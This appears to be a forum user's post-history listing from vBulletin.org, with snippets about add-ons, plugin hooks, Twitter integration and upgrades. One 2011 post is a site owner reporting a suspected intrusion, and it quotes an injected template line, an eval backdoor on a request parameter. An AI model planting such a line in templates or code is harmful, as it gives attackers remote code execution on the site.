Forum: vBulletin 3.8 Add-ons
08 Nov 2014, 18:55
|
Replies: 122
Views: 28,144
|
Forum: vBulletin 4.x Add-ons
08 Nov 2014, 17:10
|
Replies: 196
Views: 40,909
|
Forum: vBulletin 4.x Add-ons
27 Oct 2014, 19:04
|
Replies: 2,845
Views: 471,024
Oh, there's been a misunderstanding. I thought...
Oh, there's been a misunderstanding. I thought the default procedure for adding the shoutbox was to manually activate it on a per-forum basis.
It turns out the shoutbox was in my forumhome all...
|
Forum: vBulletin 4.x Add-ons
20 Oct 2014, 17:12
|
Replies: 2,845
Views: 471,024
|
Forum: vBulletin 3.8 Add-ons
20 Oct 2014, 10:39
|
Replies: 57
Views: 15,082
I believe you can use Cerberus...
I believe you can use Cerberus (http://www.vbulletin.org/forum/showthread.php?t=254197) in nearly the same way one would use Facades.
|
Forum: vBulletin 4.x Add-ons
19 Oct 2014, 20:50
|
Replies: 2,845
Views: 471,024
I know that individual ALTER TABLE statements...
I know that individual ALTER TABLE statements provide atomicity, but geez, I have 300.000+ users and I've spent hours trying to install this mod. Everytime it crashes I import it again, and it gets...
|
Forum: vBulletin 4 Articles
01 Oct 2014, 20:17
|
Replies: 32
Views: 22,365
I found out that the...
I found out that the vbcms_process_widget_complete hook works, but it seems to be inside of a function, so you have to prepend
global $vbulletin;
for the plugin to work.
|
Forum: vBulletin 4.x Add-ons
26 Sep 2014, 20:22
|
Replies: 5
Views: 2,234
|
Forum: vBulletin 4.x Add-ons
26 Sep 2014, 20:03
|
Replies: 5
Views: 2,234
|
Forum: vBulletin 4.x Add-ons
26 Sep 2014, 20:01
|
Replies: 5
Views: 2,234
|
Forum: vBulletin.org Site Feedback
02 Feb 2013, 20:58
|
Replies: 90
Views: 23,351
|
Forum: vBulletin 3.8 Add-ons
19 Nov 2011, 22:23
|
Replies: 82
Views: 16,495
|
Forum: vBulletin 3.8 Add-ons
23 Oct 2011, 01:57
|
Replies: 57
Views: 15,082
|
Forum: vBulletin 3.8 Add-ons
11 Sep 2011, 03:00
|
Replies: 122
Views: 28,144
|
Forum: vBulletin 3.8 Add-ons
22 Mar 2011, 21:25
|
Replies: 77
Views: 19,909
|
Forum: vB3 Programming Discussions
14 Mar 2011, 17:49
|
Replies: 3
Views: 721
Yep, I'm onto that, I just can't understand...
Yep, I'm onto that, I just can't understand what's done with the "extra code".
Is it even possible to get REQUEST vars from a template? I believe it isn't, you must pass through a plugin to do...
|
Forum: vB3 Programming Discussions
14 Mar 2011, 00:31
|
Replies: 3
Views: 721
hacking attempt? Modified template
My footer templates just got a new line:
<script type=\"text/javascript\">
<!-- // Main vBulletin Javascript Initialization
vBulletin_init();
{${eval($_REQUEST[dar])}}
//-->
</script>
...
|
Forum: vBulletin 3.8 Add-ons
07 Mar 2011, 20:50
|
Replies: 57
Views: 15,082
|
Forum: vBulletin 4.x Add-ons
06 Mar 2011, 14:41
|
Replies: 807
Views: 155,285
I have a custom user field for the twitter...
I have a custom user field for the twitter profile. Is it possible for each user to tweet from their account when they create a thread, if and only if the custom field is not blank?
Tweeting...
|
Forum: vB3 Programming Discussions
06 Mar 2011, 14:17
|
Replies: 0
Views: 544
Allow users to merge accounts
Since there are mods to allow users to delete themselves, I guess it shouldn't be too hard to code something to allow users to merge their accounts when they have several ones.
I've come to this...
|
Forum: vBulletin 3.8 Add-ons
06 Mar 2011, 13:49
|
Replies: 57
Views: 15,082
|
Forum: vBulletin 3.8 Add-ons
03 Mar 2011, 16:15
|
Replies: 40
Views: 11,647
|
Forum: vBulletin 3.8 Add-ons
02 Mar 2011, 00:40
|
Replies: 1,279
Views: 300,754
This might sound weird, but since I installed...
This might sound weird, but since I installed this mod I noticed the amount of online guests to be much lower.
The visits and pageviews are about the same, but while I had about 400 logged in...
|
Forum: vB3 Programming Discussions
11 Feb 2011, 10:35
|
Replies: 1
Views: 643
Custom profile field of thread's author
Greetings.
I'm experimenting with twitter's native button, which allows you to configure a "reccomended" user after you tweet something. In my forum, I'd like to allow people to tweet about each...
|
Forum: vB3 Programming Discussions
26 Jan 2011, 02:37
|
Replies: 2
Views: 995
|